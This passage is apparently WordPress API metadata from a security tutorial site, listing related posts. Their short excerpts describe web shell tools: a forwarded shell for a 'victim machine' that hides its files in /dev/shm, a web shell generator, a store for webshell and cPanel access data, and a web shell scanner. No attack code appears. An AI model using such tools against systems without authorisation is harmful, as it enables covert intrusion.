Linux","link":"https:\/\/kalilinuxtutorials.com\/category\/kali\/"},"img":{"alt_text":"","src":"https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEglLJax3PDk9d15Umt_bDrYvq1Cwhbf4oIxvgQ7eXcTF4D2jptHPK4keJbbUBbi33Cf8Urm6O4WyicycglUsGmHN5j3kx6mE2O1v02YNqknsNOTQ7V5hI2Wu5hk5eIKAKOtqyHwRiRFago6hKhddZyZOI2sdBjUeaXJpfNQ1MsjRFVvweGAvOYkTYBE\/s16000\/kali%20temp%20%285%29.png?resize=350%2C200&ssl=1","width":350,"height":200,"srcset":"https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEglLJax3PDk9d15Umt_bDrYvq1Cwhbf4oIxvgQ7eXcTF4D2jptHPK4keJbbUBbi33Cf8Urm6O4WyicycglUsGmHN5j3kx6mE2O1v02YNqknsNOTQ7V5hI2Wu5hk5eIKAKOtqyHwRiRFago6hKhddZyZOI2sdBjUeaXJpfNQ1MsjRFVvweGAvOYkTYBE\/s16000\/kali%20temp%20%285%29.png?resize=350%2C200&ssl=1 1x, https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEglLJax3PDk9d15Umt_bDrYvq1Cwhbf4oIxvgQ7eXcTF4D2jptHPK4keJbbUBbi33Cf8Urm6O4WyicycglUsGmHN5j3kx6mE2O1v02YNqknsNOTQ7V5hI2Wu5hk5eIKAKOtqyHwRiRFago6hKhddZyZOI2sdBjUeaXJpfNQ1MsjRFVvweGAvOYkTYBE\/s16000\/kali%20temp%20%285%29.png?resize=525%2C300&ssl=1 1.5x, https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEglLJax3PDk9d15Umt_bDrYvq1Cwhbf4oIxvgQ7eXcTF4D2jptHPK4keJbbUBbi33Cf8Urm6O4WyicycglUsGmHN5j3kx6mE2O1v02YNqknsNOTQ7V5hI2Wu5hk5eIKAKOtqyHwRiRFago6hKhddZyZOI2sdBjUeaXJpfNQ1MsjRFVvweGAvOYkTYBE\/s16000\/kali%20temp%20%285%29.png?resize=700%2C400&ssl=1 2x"},"classes":[]},{"id":28455,"url":"https:\/\/kalilinuxtutorials.com\/webshell\/","url_meta":{"origin":13376,"position":2},"title":"DFShell : The Best Forwarded Shell","author":"R K","date":"February 25, 2023","format":false,"excerpt":"D3Ext's Forwarded Shell is a python3 script which use mkfifo to simulate a shell into the victim machine. It creates a hidden directory in \/dev\/shm\/.fs\/ and there are stored the fifos. You can even have a tty over a webshell. In case you want a good webshell with code obfuscation,\u2026","rel":"","context":"In &quot;Kali Linux&quot;","block_context":{"text":"Kali Linux","link":"https:\/\/kalilinuxtutorials.com\/category\/kali\/"},"img":{"alt_text":"","src":"https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEgRLrOKYBzwzMTMwYKSEF9PZxoniNZ0ZIP9U4_VaCBtpefuJqB8eRtB8bXpK9qn64nVZXw701c4aIzP9GH0rU2rmIKiuz7lj6XYfqJM1a-K-FXRZaxTS_XehnBUb-EgML2Qs1TYYenmGmMbv-n-iMK7Dk3_DvTlL2VjM_iCXSqR6RrVofuAJuD23TVD\/s16000\/DFShell_1_DFShell-791006.png?resize=350%2C200&ssl=1","width":350,"height":200,"srcset":"https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEgRLrOKYBzwzMTMwYKSEF9PZxoniNZ0ZIP9U4_VaCBtpefuJqB8eRtB8bXpK9qn64nVZXw701c4aIzP9GH0rU2rmIKiuz7lj6XYfqJM1a-K-FXRZaxTS_XehnBUb-EgML2Qs1TYYenmGmMbv-n-iMK7Dk3_DvTlL2VjM_iCXSqR6RrVofuAJuD23TVD\/s16000\/DFShell_1_DFShell-791006.png?resize=350%2C200&ssl=1 1x, https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEgRLrOKYBzwzMTMwYKSEF9PZxoniNZ0ZIP9U4_VaCBtpefuJqB8eRtB8bXpK9qn64nVZXw701c4aIzP9GH0rU2rmIKiuz7lj6XYfqJM1a-K-FXRZaxTS_XehnBUb-EgML2Qs1TYYenmGmMbv-n-iMK7Dk3_DvTlL2VjM_iCXSqR6RrVofuAJuD23TVD\/s16000\/DFShell_1_DFShell-791006.png?resize=525%2C300&ssl=1 1.5x, https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEgRLrOKYBzwzMTMwYKSEF9PZxoniNZ0ZIP9U4_VaCBtpefuJqB8eRtB8bXpK9qn64nVZXw701c4aIzP9GH0rU2rmIKiuz7lj6XYfqJM1a-K-FXRZaxTS_XehnBUb-EgML2Qs1TYYenmGmMbv-n-iMK7Dk3_DvTlL2VjM_iCXSqR6RrVofuAJuD23TVD\/s16000\/DFShell_1_DFShell-791006.png?resize=700%2C400&ssl=1 2x"},"classes":[]},{"id":11779,"url":"https:\/\/kalilinuxtutorials.com\/webshell-analyzer\/","url_meta":{"origin":13376,"position":3},"title":"Webshell Analyzer : Web Shell Scanner &#038; Analyzer","author":"R K","date":"November 10, 2020","format":false,"excerpt":"Webshell analyzer is a cross platform stand-alone binary built solely for the purpose of identifying, decoding, and tagging files that are suspected to be web shells. The web shell analyzer is the bigger brother to the web shell scanner project (http:\/\/github.com\/tstillz\/webshell-scan), which only scans files via regex, no decoding or\u2026","rel":"","context":"In &quot;Kali Linux&quot;","block_context":{"text":"Kali Linux","link":"https:\/\/kalilinuxtutorials.com\/category\/kali\/"},"img":{"alt_text":"","src":"","width":0,"height":0},"classes":[]},{"id":17474,"url":"https:\/\/kalilinuxtutorials.com\/wsh\/","url_meta":{"origin":13376,"position":4},"title":"Wsh : Web Shell Generator And Command Line Interface","author":"R K","date":"August 16, 2021","format":false,"excerpt":"wsh (pronounced woosh) is a web shell generator and command line interface. This started off as just an http client since interacting with webshells is a pain. There's a form, to send a command you have to type in an input box and press a button. I wanted something that\u2026","rel":"","context":"In &quot;Kali Linux&quot;","block_context":{"text":"Kali Linux","link":"https:\/\/kalilinuxtutorials.com\/category\/kali\/"},"img":{"alt_text":"","src":"","width":0,"height":0},"classes":[]},{"id":10665,"url":"https:\/\/kalilinuxtutorials.com\/carina\/","url_meta":{"origin":13376,"position":5},"title":"Carina : Webshell, Virtual Private Server (VPS) &#038; cPanel Database","author":"R K","date":"May 30, 2020","format":false,"excerpt":"Carina is a web application used to store webshell, Virtual Private Server (VPS) and cPanel data. Carina is made so that we don't need to store webshell, VPS or cPanel data in \"strange places\". Install $ git clone https:\/\/github.com\/c0delatte\/carina && cd carinaRun composer updateEdit .env.example with your database configurationRun php\u2026","rel":"","context":"In &quot;Kali Linux&quot;","block_context":{"text":"Kali Linux","link":"https:\/\/kalilinuxtutorials.com\/category\/kali\/"},"img":{"alt_text":"","src":"","width":0,"height":0},"classes":[]}],"_links":{"self":[{"href":"https:\/\/kalilinuxtutorials.com\/wp-json\/wp\/v2\/posts\/13376","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/kalilinuxtutorials.com\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/kalilinuxtutorials.com\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/kalilinuxtutorials.com\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"https:\/\/kalilinuxtutorials.com\/wp-json\/wp\/v2\/comments?post=13376"}],"version-history":[{"count":0,"href":"https:\/\/kalilinuxtutorials.com\/wp-json\/wp\/v2\/posts\/13376\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/kalilinuxtutorials.com\/wp-json\/wp\/v2\/media\/16876"}],"wp:attachment":[{"href":"https:\/\/kalilinuxtutorials.com\/wp-json\/wp\/v2\/media?parent=13376"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/kalilinuxtutorials.com\/wp-json\/wp\/v2\/categories?post=13376"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/kalilinuxtutorials.com\/wp-json\/wp\/v2\/tags?post=13376"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}